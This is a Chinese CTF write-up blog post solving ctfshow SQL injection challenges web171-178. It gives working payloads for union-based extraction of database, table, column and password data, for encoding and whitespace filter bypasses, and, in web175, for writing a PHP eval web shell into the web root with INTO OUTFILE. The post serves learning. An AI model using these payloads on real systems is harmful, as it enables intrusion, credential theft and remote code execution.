<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="web171无过滤的字符型注入。无过滤的话，可以先用单引号逃逸出来，接着用or 1&#x3D;1 来永远符合条件，最后用注释防止limit的影响 payload:  1231’or 1&#x3D;1 --+1&#x27;or&#x27;1&#x27;&#x3D;&#x27;19999&#x27; or id &#x3D;&#x27;26  标准做法  本地调试把加号改成空格，URL编码过程中，空格通常会被转换为加号（+），因此我们传参可">
<meta property="og:type" content="article">
<meta property="og:title" content="web171-178">
<meta property="og:url" content="https://youngking-gfy.github.io/2025/03/31/web171-178/index.html">
<meta property="og:site_name" content="Youngking&#39;s Blog">
<meta property="og:description" content="web171无过滤的字符型注入。无过滤的话，可以先用单引号逃逸出来，接着用or 1&#x3D;1 来永远符合条件，最后用注释防止limit的影响 payload:  1231’or 1&#x3D;1 --+1&#x27;or&#x27;1&#x27;&#x3D;&#x27;19999&#x27; or id &#x3D;&#x27;26  标准做法  本地调试把加号改成空格，URL编码过程中，空格通常会被转换为加号（+），因此我们传参可">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250331214257772.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250331214336743.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250407125946431.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250407130303094.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401122252058.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401122941657.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401123547777.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250407132707124.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401130210172.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401130231221.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401130439834.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401130506117.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401130607705.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250407133658323.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250407133721772.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401131055945.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401131252303.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401131417799.png">
<meta property="og:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250401131454209.png">
<meta property="article:published_time" content="2025-03-31T04:32:32.000Z">
<meta property="article:modified_time" content="2025-04-07T05:40:30.527Z">
<meta property="article:author" content="Y0ungK1ng">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://youngking-gfy.github.io/2025/03/31/web171-178/file-20250331214257772.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>web171-178</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/04/03/web179-186/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/03/31/web167-170/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://youngking-gfy.github.io/2025/03/31/web171-178/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&text=web171-178"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&is_video=false&description=web171-178"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web171-178&body=Check out this article: https://youngking-gfy.github.io/2025/03/31/web171-178/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&name=web171-178&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://youngking-gfy.github.io/2025/03/31/web171-178/&t=web171-178"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web171"><span class="toc-number">1.</span> <span class="toc-text">web171</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web172"><span class="toc-number">2.</span> <span class="toc-text">web172</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web173"><span class="toc-number">3.</span> <span class="toc-text">web173</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web174"><span class="toc-number">4.</span> <span class="toc-text">web174</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web175"><span class="toc-number">5.</span> <span class="toc-text">web175</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web176"><span class="toc-number">6.</span> <span class="toc-text">web176</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web177"><span class="toc-number">7.</span> <span class="toc-text">web177</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80%EF%BC%9A%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="toc-number">7.1.</span> <span class="toc-text">解法一：万能密码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%EF%BC%9A%E6%AD%A3%E5%B8%B8%E6%9F%A5%E8%AF%A2"><span class="toc-number">7.2.</span> <span class="toc-text">解法二：正常查询</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web178"><span class="toc-number">8.</span> <span class="toc-text">web178</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        web171-178
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Y0ungK1ng</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-03-31T04:32:32.000Z" class="dt-published" itemprop="datePublished">2025-03-31</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E5%AE%89%E5%85%A8/">渗透安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag">sql注入</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="web171"><a href="#web171" class="headerlink" title="web171"></a>web171</h3><p>无过滤的字符型注入。<br>无过滤的话，可以先用单引号逃逸出来，接着用<code>or 1=1</code> 来永远符合条件，最后用注释防止limit的影响</p>
<p>payload: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1’or 1=1 --+</span><br><span class="line">1&#x27;or&#x27;1&#x27;=&#x27;1</span><br><span class="line">9999&#x27; or id =&#x27;26</span><br></pre></td></tr></table></figure>

<p>标准做法</p>
<blockquote>
<p>本地调试把加号改成空格，URL编码过程中，空格通常会被转换为加号（+），因此我们传参可以用加号</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">爆出有哪些位置可以进行输出数据 </span><br><span class="line"><span class="number">1</span><span class="string">&#x27; order by 3--+ </span></span><br><span class="line"><span class="string">查看数据库名字 </span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,database()<span class="comment">--+ </span></span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> ctfshow_web</span><br><span class="line">爆破表名： </span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; union select 1,2,group_concat(table_name) FROM information_schema.tables where table_schema=database()--+ </span></span><br><span class="line"><span class="string">// ctfshow_user</span></span><br><span class="line"><span class="string">爆破列名： </span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(column_name) <span class="keyword">FROM</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span>database() <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;ctfshow_user&#x27;</span><span class="comment">--+ </span></span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> id,username,password</span><br><span class="line">爆破数据： </span><br><span class="line"><span class="number">1</span><span class="string">&#x27; union select 1,2,group_concat(id,username,password) FROM ctfshow_user--+</span></span><br></pre></td></tr></table></figure>




<p>找到flag。<br><img src="/2025/03/31/web171-178/file-20250331214257772.png"></p>
<p><img src="/2025/03/31/web171-178/file-20250331214336743.png"></p>
<h3 id="web172"><a href="#web172" class="headerlink" title="web172"></a>web172</h3><p>开启容器</p>
<p>尝试上题payload失败<br>因为直接<code>-1&#39; or 1=1 --+</code> flag字段会被过滤，<br>但是只要回显不输出username就可以绕过过滤</p>
<p><img src="/2025/03/31/web171-178/file-20250407125946431.png"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">爆出有哪些位置可以进行输出数据 </span><br><span class="line"><span class="number">1</span><span class="string">&#x27; order by 2--+ </span></span><br><span class="line"><span class="string">爆破表名 </span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">2</span>,group_concat(table_name) <span class="keyword">FROM</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database()<span class="comment">--+ </span></span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> ctfshow_user,ctfshow_user2</span><br><span class="line">爆破列名 </span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; union select 2,group_concat(column_name) FROM information_schema.columns where table_schema=database() and table_name=&#x27;</span>ctfshow_user2<span class="string">&#x27;--+ </span></span><br><span class="line"><span class="string">// id,username,password</span></span><br><span class="line"><span class="string">爆破flag </span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">2</span>,group_concat(password) <span class="keyword">FROM</span> ctfshow_user2 <span class="keyword">where</span> username<span class="operator">=</span><span class="string">&#x27;flag&#x27;</span><span class="comment">--+</span></span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> ctfshow&#123;<span class="number">9</span>a6fd71f<span class="number">-2</span>bb6<span class="number">-417</span>f<span class="operator">-</span>b46f<span class="operator">-</span>a1c906476499&#125;</span><br></pre></td></tr></table></figure>


<p><img src="/2025/03/31/web171-178/file-20250407130303094.png"></p>
<h3 id="web173"><a href="#web173" class="headerlink" title="web173"></a>web173</h3><p>这次将所有回显过滤flag，直接编码绕过或者如上题只显示password列即可，但其他题目中肯定不起作用</p>
<p>mysql中用<code>to_base64</code></p>
<p>首先确认是三列</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; order by 3--+ </span></span><br></pre></td></tr></table></figure>

<p>思路一：对查询数据做限定，因为已经知道了，在密码一栏中没有<code>flag</code>，就如同172最后</p>
<p><code>1&#39; union select 1,2,group_concat(&#39;+&#39;,password) from ctfshow_user3 where username=&#39;flag&#39;--+</code></p>
<p>思路2：编码绕过,base64，hex都可以</p>
<p><code>1&#39; union select 1,2,to_base64(password) from ctfshow_user3 where username=&#39;flag&#39;--+</code><br><code>-1&#39; union select 1,to_base64(username),hex(password) from ctfshow_user3 --+</code></p>
<p><img src="/2025/03/31/web171-178/file-20250401122252058.png"></p>
<h3 id="web174"><a href="#web174" class="headerlink" title="web174"></a>web174</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//检查结果是否有flag</span><br><span class="line">    if(!preg_match(&#x27;/flag|[0-9]/i&#x27;, json_encode($ret)))&#123;</span><br><span class="line">      $ret[&#x27;msg&#x27;]=&#x27;查询成功&#x27;;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>不允许有数字</p>
<p>替换：将数据to_base64加密，然后将里面所有的数字用replace()替换</p>
<p>替换方式：<code>1 testa</code>,<code>2 testb</code> <code>3 testc</code>等等</p>
<p><code>-1&#39; union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),2,&#39;testb&#39;) ,3,&#39;testc&#39;) ,4,&#39;testd&#39;) ,5,&#39;teste&#39;) ,6,&#39;testf&#39;) ,7,&#39;testg&#39;) ,8,&#39;testh&#39;) ,9,&#39;testi&#39;) ,0,&#39;testj&#39;) ,1,&#39;testa&#39;),replace(1,&#39;1&#39;,&#39;testa&#39;) from ctfshow_user4 where username=&#39;flag&#39;--+</code></p>
<p><img src="/2025/03/31/web171-178/file-20250401122941657.png"></p>
<p><img src="/2025/03/31/web171-178/file-20250401123547777.png"></p>
<h3 id="web175"><a href="#web175" class="headerlink" title="web175"></a>web175</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//检查结果是否有flag</span><br><span class="line">    if(!preg_match(&#x27;/[\x00-\x7f]/i&#x27;, json_encode($ret)))&#123;</span><br><span class="line">      $ret[&#x27;msg&#x27;]=&#x27;查询成功&#x27;;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>将数据输出到一个文件中，然后访问对应文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select  username,password from ctfshow_user5 into outfile &quot;/var/www/html/1.txt&quot;--+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/03/31/web171-178/file-20250407132707124.png"></p>
<p>还可以直接传入一句话木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,&quot;&lt;?php eval($_POST[1]);?&gt;&quot; into outfile &quot;/var/www/html/1.php</span><br><span class="line">-1&#x27; union select 1,from_base64(&quot;%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b&quot;) into outfile &#x27;/var/www/html/1.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>


<p><img src="/2025/03/31/web171-178/file-20250401130210172.png"></p>
<p><img src="/2025/03/31/web171-178/file-20250401130231221.png"></p>
<p>看数据库信息<br><img src="/2025/03/31/web171-178/file-20250401130439834.png"></p>
<p><img src="/2025/03/31/web171-178/file-20250401130506117.png"><br>连接蚁剑</p>
<p><img src="/2025/03/31/web171-178/file-20250401130607705.png"></p>
<h3 id="web176"><a href="#web176" class="headerlink" title="web176"></a>web176</h3><p>万能密码直接查到<br><code>-1&#39; or username=&#39;flag</code></p>
<p><code>1&#39; or 1=1--+</code>也没被过滤</p>
<h3 id="web177"><a href="#web177" class="headerlink" title="web177"></a>web177</h3><p>空格被过滤，就相当于把注释符<code>-- </code>给过滤掉<br>用<code>/**/</code>或者是<code>%0a</code>（回车）或者<code>%09</code>（tab）来绕过空格的过滤，<code>%23</code>（#）来绕过注释符的过滤</p>
<h4 id="解法一：万能密码"><a href="#解法一：万能密码" class="headerlink" title="解法一：万能密码"></a>解法一：万能密码</h4><p><code>1&#39;or/**/1=1%23</code></p>
<p><code>/**/绕过空格</code></p>
<p><img src="/2025/03/31/web171-178/file-20250407133658323.png"><br><img src="/2025/03/31/web171-178/file-20250407133721772.png"></p>
<h4 id="解法二：正常查询"><a href="#解法二：正常查询" class="headerlink" title="解法二：正常查询"></a>解法二：正常查询</h4><p><code>1&#39;/**/union/**/select/**/1,2,password/**/from/**/ctfshow_user/**/where/**/username=&#39;flag&#39;%23</code></p>
<p><img src="/2025/03/31/web171-178/file-20250401131055945.png"></p>
<p><img src="/2025/03/31/web171-178/file-20250401131252303.png"></p>
<h3 id="web178"><a href="#web178" class="headerlink" title="web178"></a>web178</h3><p>过滤了空格与<code>*</code>号等用<code>%09</code>（tab）、<code>%0a</code>（回车）绕过<br>id&#x3D;1’or’1’&#x3D;’1’%23</p>
<p><img src="/2025/03/31/web171-178/file-20250401131417799.png"></p>
<p>payload: <code>1&#39;%09union%09select%091,2,(select%09password%09from%09ctfshow_user%09where%09username%09=%09&#39;flag&#39;)%09%23</code></p>
<p><img src="/2025/03/31/web171-178/file-20250401131454209.png"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web171"><span class="toc-number">1.</span> <span class="toc-text">web171</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web172"><span class="toc-number">2.</span> <span class="toc-text">web172</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web173"><span class="toc-number">3.</span> <span class="toc-text">web173</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web174"><span class="toc-number">4.</span> <span class="toc-text">web174</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web175"><span class="toc-number">5.</span> <span class="toc-text">web175</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web176"><span class="toc-number">6.</span> <span class="toc-text">web176</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web177"><span class="toc-number">7.</span> <span class="toc-text">web177</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80%EF%BC%9A%E4%B8%87%E8%83%BD%E5%AF%86%E7%A0%81"><span class="toc-number">7.1.</span> <span class="toc-text">解法一：万能密码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%EF%BC%9A%E6%AD%A3%E5%B8%B8%E6%9F%A5%E8%AF%A2"><span class="toc-number">7.2.</span> <span class="toc-text">解法二：正常查询</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web178"><span class="toc-number">8.</span> <span class="toc-text">web178</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://youngking-gfy.github.io/2025/03/31/web171-178/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&text=web171-178"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&is_video=false&description=web171-178"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web171-178&body=Check out this article: https://youngking-gfy.github.io/2025/03/31/web171-178/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&title=web171-178"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://youngking-gfy.github.io/2025/03/31/web171-178/&name=web171-178&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://youngking-gfy.github.io/2025/03/31/web171-178/&t=web171-178"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Y0ungK1ng
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
